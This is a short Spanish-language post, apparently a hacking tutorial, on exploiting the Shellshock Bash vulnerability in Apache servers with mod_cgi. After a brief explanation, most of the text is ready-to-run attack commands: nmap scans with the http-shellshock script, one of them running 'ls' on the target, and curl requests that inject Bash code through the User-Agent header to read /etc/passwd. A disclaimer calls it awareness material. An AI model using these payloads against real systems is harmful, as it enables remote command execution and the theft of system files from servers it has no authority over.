
Explotación de la vulnerabilidad "Shellshock". Ejecución remota de código en Apache con mod_cgi
Shellshock es efectivamente una vulnerabilidad de ejecución remota de comandos en BASH. Este script explota la vulnerabilidad en el entorno web en Apache o similar con mod_cgi habilitado. La vulnerabilidad radica en la manipulación de variables de entorno, que son valores dinámicos con nombre que afectan a cómo se ejecutan los procesos en una computadora. Los atacantes pueden explotar esto adjuntando código malicioso a las variables de entorno, que se ejecuta al recibir dicha variable. Esto permite a los atacantes comprometer potencialmente el sistema.
$ nmap 192.168.x.x --script=http-shellshock --script-args uri=/cgi-bin/admin.cgi
$ nmap -sV -p- --script http-shellshock 192.168.x.x
$ nmap -sV -p- --script http-shellshock --script-args uri=/cgi-bin/bin,cmd=ls 192.168.x.x
sudo curl -H "User-Agent: () { :; }; /bin/cat /etc/passwd" <WEBSERVER-IP>
sudo curl -A "() { :;}; echo Content-Type: text/html; echo; /bin/cat /etc/passwd;" <WEBSERVER-IP>
No soy responsable de ningún uso ilegal o daño causado por esta herramienta. Fue escrita por diversión, no para hacer el mal, y tiene como objetivo concienciar sobre el hacking y la ciberseguridad.
¡Buen hacking :)